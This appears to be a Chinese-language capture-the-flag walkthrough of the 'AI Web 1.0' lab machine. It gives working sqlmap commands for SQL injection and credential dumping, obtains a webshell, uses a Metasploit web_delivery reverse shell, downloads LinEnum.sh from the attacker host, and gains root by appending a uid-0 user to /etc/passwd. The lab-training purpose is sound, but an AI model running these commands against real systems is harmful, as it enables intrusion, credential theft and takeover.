zoukankan      html  css  js  c++  java
  • AI Web 1.0

    kali:192.168.0.103

    目标机:192.168.0.105

    0X01 端口和目录扫描

    打开目标主页没有任何信息

    clipboard

    a) 端口扫描

    只有一个80端口开启

    clipboard

    b) 目录扫描

    clipboard

    0x03 查看敏感目录robots

    clipboard

    访问敏感目录地址

    两个目录都没有权限访问

    尝试继续挖掘

    在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息

    clipboard

    http://192.168.0.105/se3reTdir777/uploads/没有挖到任何目录,此时回过头来看看上一级目录是什么

    clipboard

    是一个查看信息输入框。

    结合现在所得到的信息,能想到的只有输入框是否有sql注入


    0X04 SQL注入

    clipboard

    a) 验证漏洞是否存在

    将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的

    b) sqlmap跑数据库

    抓包生成re.txt文件

    clipboard

    运行sqlmap

    sqlmap -r /root/re.txt --dbs --batch

    clipboard

    最终得到的数据库账号密码

    sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch

    clipboard

    由此我们得到了凭证


    0X05 sqlmap get webshell

    sqlmap -r /root/re.txt --os-shell

    clipboard

    clipboard

    这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息

    clipboard

    网站根路径/home/www/html/web1x443290o2sdf92213

    clipboard

    出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功

    clipboard


    0X06 系统提权

    a) 反弹交互式shell

    使用命令执行的方式获取反弹shell

    use exploit/multi/script/web_delivery

    clipboard

    b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)

    cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp

    执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行

    c) 编辑passwd文件 添加root权限用户

    perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

    切换用户 su test

    密码 password@123

  • 相关阅读:
    linux安装及入门
    20165103学习基础和C语言基础调查
    20165103 我期望的师生关系
    自旋锁,偏向锁,轻量级锁 和 重量级锁
    volatile的使用及其原理
    (PASS)什么是原子性和原子性操作?
    Linux操作系统 和 Windows操作系统 的区别
    Linux常用命令大全(很全面)
    CAS机制总结
    CAS -- ABA问题的解决方案
  • 原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
Copyright © 2011-2022 走看看